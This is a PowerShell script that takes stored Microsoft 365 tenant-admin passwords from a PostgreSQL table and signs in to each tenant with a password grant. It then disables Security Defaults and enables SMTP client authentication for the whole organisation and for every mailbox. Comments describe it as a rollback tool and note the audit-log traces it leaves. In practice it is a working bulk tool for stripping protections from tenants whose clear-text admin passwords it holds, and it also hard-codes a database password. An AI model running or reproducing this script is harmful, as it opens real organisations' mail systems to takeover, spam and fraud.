#!/usr/bin/env pwsh
# Bulk tenant-control rollback driver. For every account row returned by the
# query below it signs in with the stored admin password (ROPC), switches the
# tenant's Security Defaults policy off if it is on, then connects to Exchange
# Online and enables SMTP client authentication at the transport-config and
# per-mailbox level. Every step is a control-plane change that lands in the
# tenant's own telemetry (Entra sign-in and audit logs, Exchange admin audit
# log), which is where a defender would look for this sequence.
#
# Inputs:  PostgreSQL database adx_system on localhost, table office_accounts
#          (admin_email, admin_password, tenant_domain, source, status, id).
# Outputs: one progress line per account on stdout, then an OK/FAILED summary.

# Non-terminating errors do not abort the loop; the calls that matter pass
# -ErrorAction Stop so they raise into the try/catch below instead.
$ErrorActionPreference = "Continue"

# Database password hard-coded in the script and exported to the environment
# of every child process (psql reads it from PGPASSWORD).
$env:PGPASSWORD = "admin123"

# Get Ismael accounts (Active status, valid password, own tenant admin)
# -t (tuples only) -A (unaligned) -F '|' make psql emit one
# "email|password|domain" line per row; the Split('|') below depends on that
# delimiter. The query reads admin_password directly, so the office_accounts
# table holds tenant-admin passwords in clear text. LIMIT 10 caps one run at
# ten accounts.
$csv = & psql -h localhost -U admin -d adx_system -t -A -F '|' -c @"
SELECT admin_email, admin_password, tenant_domain
FROM office_accounts
WHERE source = 'Ismael'
AND LOWER(status) IN ('active')
AND admin_password IS NOT NULL AND admin_password != ''
AND admin_email NOT LIKE 'sysadmin_%'
AND tenant_domain LIKE '%.onmicrosoft.com'
ORDER BY id
LIMIT 10
"@

# Per-run counters, reported in the summary at the end.
$ok = 0; $fail = 0

foreach ($line in $csv) {
    # psql can emit trailing blank lines; skip them.
    if ([string]::IsNullOrWhiteSpace($line)) { continue }
    $parts = $line.Split('|')
    $email = $parts[0].Trim()
    $pw = $parts[1].Trim()
    $tenant = $parts[2].Trim()

    # Running index = accounts already processed (ok + failed) + 1.
    Write-Host "[$($ok+$fail+1)] $email ($tenant)"

    try {
        # Step 1: Get token via ROPC flow
        # Resource Owner Password Credentials: the username and password are
        # posted straight to the tenant's v1 token endpoint, with no
        # interactive sign-in. The grant cannot complete an MFA challenge, so
        # MFA-protected accounts are expected to end up in the catch branch;
        # successful ones show up in the Entra sign-in log as a password-grant
        # sign-in under this client_id against the Graph resource.
        $tokenBody = @{
            grant_type = "password"
            client_id = "1b730954-1685-4b74-9bfd-dac224a7b894"
            resource = "https://graph.microsoft.com"
            username = $email
            password = $pw
            scope = "openid"
        }
        $tokenResp = Invoke-RestMethod -Method POST -Uri "https://login.microsoftonline.com/$tenant/oauth2/token" -Body $tokenBody -ErrorAction Stop
        $token = $tokenResp.access_token
        Write-Host " Token: OK"

        $headers = @{
            Authorization = "Bearer $token"
            "Content-Type" = "application/json"
        }

        # Step 2: Check Security Defaults status
        # Reads the tenant-wide identitySecurityDefaultsEnforcementPolicy via Graph.
        $sdResp = Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/policies/identitySecurityDefaultsEnforcementPolicy" -Headers $headers -ErrorAction Stop
        Write-Host " Security Defaults: isEnabled=$($sdResp.isEnabled)"

        if ($sdResp.isEnabled) {
            # Disable Security Defaults
            # PATCH sets isEnabled=false for the whole tenant. Security
            # Defaults is the baseline that, among other things, blocks
            # legacy authentication; once it is off, only a Conditional
            # Access policy (if one exists) still blocks legacy protocols.
            # The change is written to the Entra audit log as a policy
            # update performed by this admin account.
            $disableBody = '{"isEnabled":false}'
            Invoke-RestMethod -Method PATCH -Uri "https://graph.microsoft.com/v1.0/policies/identitySecurityDefaultsEnforcementPolicy" -Headers $headers -Body $disableBody -ErrorAction Stop
            Write-Host " -> DISABLED Security Defaults"
        }

        # Step 3: Enable SMTP AUTH via Exchange
        # The same stored password is reused as a basic credential for
        # Exchange Online. Set-TransportConfig ... $false turns SMTP AUTH on
        # org-wide; the loop then clears the per-mailbox override on every
        # CAS mailbox so none keeps it disabled. Both cmdlets are recorded in
        # the Exchange admin audit log. Per-mailbox errors are suppressed
        # (SilentlyContinue), so the "$($mbs.Count) mailboxes" line counts
        # mailboxes enumerated, not mailboxes actually changed.
        $secPwd = ConvertTo-SecureString $pw -AsPlainText -Force
        $cred = New-Object System.Management.Automation.PSCredential($email, $secPwd)
        Connect-ExchangeOnline -Credential $cred -ShowBanner:$false -ErrorAction Stop
        Set-TransportConfig -SmtpClientAuthenticationDisabled $false -ErrorAction Stop
        $mbs = Get-CASMailbox -ResultSize Unlimited
        foreach ($mb in $mbs) {
            Set-CASMailbox -Identity $mb.Identity -SmtpClientAuthenticationDisabled $false -ErrorAction SilentlyContinue
        }
        Write-Host " Exchange: SMTP AUTH enabled ($($mbs.Count) mailboxes)"
        Disconnect-ExchangeOnline -Confirm:$false -ErrorAction SilentlyContinue

        $ok++
    }
    catch {
        # Any Stop-level failure (token, Graph read/PATCH, Exchange connect or
        # Set-TransportConfig) lands here. The message is cut to 100 chars for
        # the log line, any open Exchange session is torn down (Disconnect runs
        # even if Connect never succeeded; its errors are suppressed), and the
        # account is counted as failed.
        $err = $_.Exception.Message
        Write-Host " FAIL: $($err.Substring(0, [Math]::Min(100, $err.Length)))"
        Disconnect-ExchangeOnline -Confirm:$false -ErrorAction SilentlyContinue
        $fail++
    }
}

Write-Host "`n=== RESULT: $ok OK, $fail FAILED ==="
EOF_PS 2>&1 |